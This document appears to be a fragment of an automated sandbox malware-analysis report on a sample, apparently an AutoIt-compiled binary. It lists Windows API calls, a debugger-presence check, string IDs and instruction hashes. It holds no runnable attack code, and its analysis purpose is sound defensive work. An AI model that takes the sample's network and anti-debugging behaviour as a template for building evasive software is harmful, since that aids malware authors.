                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007FD13A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CrackInternet_wcslen
                                    • String ID: |
                                    • API String ID: 596671847-2343686810
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00813621
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0081365C
                                    Strings
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0081461F
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00814634
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081327C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00813287
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    APIs
                                      • Part of subcall function 0078600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                      • Part of subcall function 0078600E: GetStockObject.GDI32(00000011), ref: 00786060
                                      • Part of subcall function 0078600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    • GetWindowRect.USER32(00000000,?), ref: 0081377A
                                    • GetSysColor.USER32(00000012), ref: 00813794
                                    Strings
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007FCD7D
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007FCDA6
                                    Strings
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 008134AB
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008134BA
                                    Strings
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • CharUpperBuffW.USER32(?,?,?), ref: 007E6CB6
                                    • _wcslen.LIBCMT ref: 007E6CC2
                                    Strings
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: STOP
                                    • API String ID: 1256254125-2411985666
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007E1D4C
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 007E1C46
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007E1CC8
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 007E1DD3
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: 3, 3, 16, 1
                                    • API String ID: 176396367-3042988571
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007E0B23
                                    Strings
                                    Similarity
                                    • API ID: Message
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 2030045667-4017498283
                                    APIs
                                      • Part of subcall function 0079F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007A0D71,?,?,?,0078100A), ref: 0079F7CE
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0078100A), ref: 007A0D75
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0078100A), ref: 007A0D84
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007A0D7F
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 55579361-631824599
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: %.3d$X64
                                    • API String ID: 481472006-1077770165
                                    • Opcode ID: a168d56307345c0147a89f84a96c5f2aeba34fed44dd4f705e95c8a233579c45
                                    • Instruction ID: 677c77b4d5b6ce760428f8b071209bfc2b3fb41652d96546c3acb1cc1b4fdfae
                                    • Opcode Fuzzy Hash: a168d56307345c0147a89f84a96c5f2aeba34fed44dd4f705e95c8a233579c45
                                    • Instruction Fuzzy Hash: 8DD012B1848108EACF609AE0DD498F9B37CFB18341F508453F806D1240D63CED086761
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0081232C
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0081233F
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: ca44c14b9188eecf2e2b0d1c48a97fdc4995d353859313c42b0f8bfd7ee98525
                                    • Instruction ID: 9bc1bb70259d718ddac8f91ed3df0743949318f32ac16f0f898a3fa5c70629cc
                                    • Opcode Fuzzy Hash: ca44c14b9188eecf2e2b0d1c48a97fdc4995d353859313c42b0f8bfd7ee98525
                                    • Instruction Fuzzy Hash: AED0A9323C0300BAE2A4A770DC0FFC6AA08BF00B00F008A167205AA1D0D8A4A800CA00
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0081236C
                                    • PostMessageW.USER32(00000000), ref: 00812373
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 92ba9f6dea78c2f1ca1ac864754035d57f2593c8080f88b586d5caa8e830482b
                                    • Instruction ID: 5702ef40ea9a107071711c24d36abbac57fbdbf8e5975ef205f62b3013e97035
                                    • Opcode Fuzzy Hash: 92ba9f6dea78c2f1ca1ac864754035d57f2593c8080f88b586d5caa8e830482b
                                    • Instruction Fuzzy Hash: 7ED0A9323C1300BAE2A4A770DC0FFC6A608BB04B00F008A167201EA1D0D8A4B800CA04
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 007BBE93
                                    • GetLastError.KERNEL32 ref: 007BBEA1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BBEFC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 2d1216d981df1190f43e9dba38fb4eba3b8ed71975da489fdac5a8ef63a9fbf7
                                    • Instruction ID: f3d19ec39489389d7fc0b2da6e8b5ea48b169c972edf3ea581c73a18d48eadd6
                                    • Opcode Fuzzy Hash: 2d1216d981df1190f43e9dba38fb4eba3b8ed71975da489fdac5a8ef63a9fbf7
                                    • Instruction Fuzzy Hash: 7C41E735605206EFCF218FA5CC88BFA7BA9EF42710F144169FD59971A1EBB48D01DB50